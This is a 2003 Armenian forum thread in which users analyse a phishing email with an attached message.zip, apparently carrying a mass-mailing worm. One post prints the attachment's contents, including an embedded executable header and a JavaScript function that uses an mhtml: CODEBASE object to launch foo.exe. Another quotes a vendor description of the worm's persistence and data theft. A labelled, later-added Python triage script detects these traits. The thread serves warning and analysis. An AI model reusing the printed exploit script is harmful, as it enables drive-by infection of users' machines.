Armenian Knowledge Base  

05.08.2003, 21:18   #1
Mono (Moderator, Yerevan)
Question: Hackers are attacking....

Look at what I've been getting for two days now


---



Hello there,

I would like to inform you about important information regarding your
email address. This email address will be expiring.
Please read attachment for details.

---
Best regards, Administrator
fdqftckt

----


And here are the headers, so to speak

----

Return-Path: <[email protected]>
Received: from styx.aic.net (styx.aic.net [195.250.64.68])
by gampr.freenet.am (8.12.9/8.12.9) with ESMTP id h728oRXC002023
for <[email protected]>; Sat, 2 Aug 2003 13:50:27 +0500 (AMST)
Received: from [217.113.7.194] (helo=localhost)
by styx.aic.net with smtp (Exim 4.20)
id 19is5b-000CWQ-9A
for [email protected]; Sat, 02 Aug 2003 13:50:14 +0500
From: [email protected]
To: Mono <[email protected]>
Reply-To: [email protected]
X-Mailer: The Bat! (v1.61)
X-Priority: 2 (High)
Subject: your account fdqftckt
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----------18AB777E094567B"
Message-Id: <[email protected]>
Date: Sat, 02 Aug 2003 13:50:14 +0500
Content-Length: 26147
Status:

------

With an attached file message.zip.

In short, I didn't open it.

What do you say?

1. Is it a virus??
2. Hackers??
3. Or is it really the end of Freenet??
05.08.2003, 21:25   #2
Yerkanian (freelancer)

Someone among Web's clients is sending trojan mail through Arminco's mail server to FreeNet newbies
05.08.2003, 21:35   #3
Mono (Moderator)

Yerkanian

Is it a ZIP file or an EXE file, in your opinion?
05.08.2003, 21:44   #4
Yerkanian (freelancer)

Only a newbie would think of opening such an attachment.

Delete it, damn it... and if you have doubts, call the administration and ask whether they sent such an email.

Elementary...
05.08.2003, 21:54   #5
Art007 (Fireman - fireConsoler, Yerevan)

Not only to FreeNet users; today I also received exactly the same letter with the same headers on Yahoo mail. Just delete.
05.08.2003, 22:00   #6
Mono (Moderator)

Guys, I put it wrong.

What interests me: is this a zip file? If so, could there be an EXE inside, or what??

Or else it's a zip file that uses a bug in WinZip to trojan via WinZip.

Or it isn't a zip file at all but an EXE.

I'm somewhat curious what's inside
05.08.2003, 22:24   #7
Yerkanian (freelancer)

Hmm, curiosity killed the rabbit

Look at the contents with some viewer; if the first two characters are "MZ", it's an exe, and nearby there will probably also be "This program cannot be run in DOS mode."
05.08.2003, 22:53   #8
Mono (Moderator)

Interesting, though; look at the insides of this file

Not for nothing did I burn with curiosity like that

===========

PK__
[email protected]__•I_____message.htmlMIME-Version: 1.0
Content-Location:File://foo.exe
Content-Transfer-Encoding: binary

MZђ_________яя__ё_______@___________________________________Ђ_____є__ґ Н!ё_LН!This program cannot be run in DOS mode. $_______PE__L___ЁќЈ?________а___



<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script>PK____
[email protected]__•I___________ _______message.htmlPK__________:___їI____
05.08.2003, 22:58   #9
Medved Kosolapiy (a bachelor, period.)

Probably a BAT file with a Zip icon.
That's how "mp3s" were sent around: a BAT file with a WinAmp icon, and nobody even thought to wonder why the icon was like that even if there was no WinAmp on the computer?!
05.08.2003, 23:04   #10
DaNYer (Banned, Brooklyn, New York)

Interesting, this virus doesn't look like a trojan... does it just say "moo ha ha"?

By the way, maybe it's this one ---> announcement from yahoo:
05.08.2003, 23:08   #11
DaNYer (Banned, Brooklyn, New York)

And also here:
http://securityresponse.symantec.com...[email protected]

The virus has been identified!!!
Quote:
When [email protected] is run, it does the following:


Copies itself to %Windir%\Videodrv.exe.


Adds the value:

"VideoDriver"="%Windir%\videodrv.exe"

to the registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

so that [email protected] runs when you start Windows.


Collects email addresses from all the files except those with the following file extensions:
.bmp
.jpg
.gif
.exe
.dll
.avi
.mpg
.mp3
.vxd
.ocx
.psd
.tif
.zip
.rar
.pdf
.cab
.wav
.com


Writes all the email addresses to the file, %Windir%\eml.tmp, if it can resolve www.google.com to any IP address.


Captures text from specific windows and sends the data to email addresses that the worm contains.


Uses its own SMTP server to spread by email.
The email has the following characteristics:

From: admin@<current domain> (The from address may be spoofed to appear that it is coming from the current domain)

Subject: your account %s

Message:
Hello there,
I would like to inform you about important information regarding your email address. This email address will be expiring. Please read attachment for details.

Best regards,
Administrator

Attachment: Message.zip


Message.zip contains only one file, Message.htm, which uses a code base exploit to create a copy of the worm named Foo.exe in the Temporary Internet Files folder, and then runs it. The compression method of this file inside the zip file is stored so that compression is not used at all.

Information about this vulnerability and a Microsoft patch is located at: http://support.microsoft.com/default...;en-us;330994. We encourage system administrators to apply the Microsoft patch to prevent infection by this worm.


When the HTML file is executed, it will cause the following registry key to be created:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{11111111-1111-1111-1111-111111111111}


The worm creates two additional files in the %Windir% folder:
Zip.tmp: This is a temporary copy of message.zip (30,079 bytes).
Exe.tmp: This is a temporary copy of message.html (29,957 bytes).
06.08.2003, 04:51   #12
Agregat (Sad..., Where it always rains)

Since the mail address [email protected] doesn't exist, this letter should be sent packing right away, and to hell with the attachment
06.08.2003, 06:07   #13
greka (Academician)

I always drop attachments into NOTEPAD.

The headers are very easy to recognize, whether it's an exe, a script, WinZIP or the like: just try it on ordinary files and you'll notice the common info in the leading bytes.

But should Arminco be held responsible for such actions, or not?
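An added triage script, not code from this thread or from Symantec, in the spirit of posts #7 and #13 (judge a file by its leading bytes, not its extension) and of the Symantec description above (a stored ZIP entry holding an HTML file that carries an MZ executable and an mhtml: CODEBASE object). It classifies an attachment by magic bytes and, for a ZIP, reports each entry's compression method and whether it embeds an MZ/DOS-stub pair or an mhtml: CODEBASE reference. The sample archive is constructed in memory with an inert placeholder where the worm would carry its executable.

```python
import io
import re
import zipfile

MAGIC = {b"PK\x03\x04": "zip", b"MZ": "exe (MZ/PE header)"}
DOS_STUB = b"This program cannot be run in DOS mode"
# the OBJECT CODEBASE="mhtml:...!File://foo.exe" reference quoted in post #8
MHTML_CODEBASE = re.compile(rb'CODEBASE\s*=\s*"mhtml:', re.IGNORECASE)

def classify(data: bytes) -> str:
    """Guess the real type from the leading bytes (post #13), ignoring the extension."""
    for sig, name in MAGIC.items():
        if data.startswith(sig):
            return name
    if data.startswith(b"MIME-Version:") or data.lstrip().startswith(b"<"):
        return "html/mime text"
    return "unknown"

def triage_zip(data: bytes) -> list:
    """Describe every ZIP entry without opening it in a browser or running anything."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            content = zf.read(info)
            findings.append({
                "name": info.filename,
                # Symantec notes the entry was 'stored', i.e. not compressed at all
                "stored": info.compress_type == zipfile.ZIP_STORED,
                # an MZ header plus the DOS stub inside an .htm entry = embedded PE file (post #7)
                "embedded_exe": b"MZ" in content and DOS_STUB in content,
                "mhtml_codebase": bool(MHTML_CODEBASE.search(content)),
            })
    return findings

def is_suspicious(findings: list) -> bool:
    return any(f["embedded_exe"] or f["mhtml_codebase"] for f in findings)

def build_sample(malicious: bool = True) -> bytes:
    """Constructed stand-in for message.zip; the 'exe' bytes are an inert placeholder."""
    if malicious:
        html = (b"MIME-Version: 1.0\r\nContent-Location:File://foo.exe\r\n"
                b"Content-Transfer-Encoding: binary\r\n\r\nMZ\x90\x00" + DOS_STUB +
                b'.\r\n<OBJECT CODEBASE="mhtml:C:\\tmp\\message.html!File://foo.exe"></OBJECT>')
    else:
        html = b"<html><body>No message</body></html>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_STORED) as zf:
        zf.writestr("message.html", html)
    return buf.getvalue()
```

To try it on the constructed sample, call `triage_zip(build_sample())` and pass the result to `is_suspicious()`; for a real attachment, read the file as bytes and run `classify()` first.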
06.08.2003, 06:49   #14
Aram Hambardzumyan (The Reloaded)

I also received such a letter. The attachment is a normal zip. An html file sits inside the zip, part of which is an exe. Probably if you open it in IE, something or other will happen...
06.08.2003, 06:52   #15
Aram Hambardzumyan (The Reloaded)

Quote:
Originally posted by Greco El
But should Arminco be held responsible for such actions, or not?
If it's their user, they should box his ears. How to make them do that, I don't know. Once I got a suspicious letter from a Netsys client, reported it to them, and got neither an answer nor a hello. Such providers should be whacked.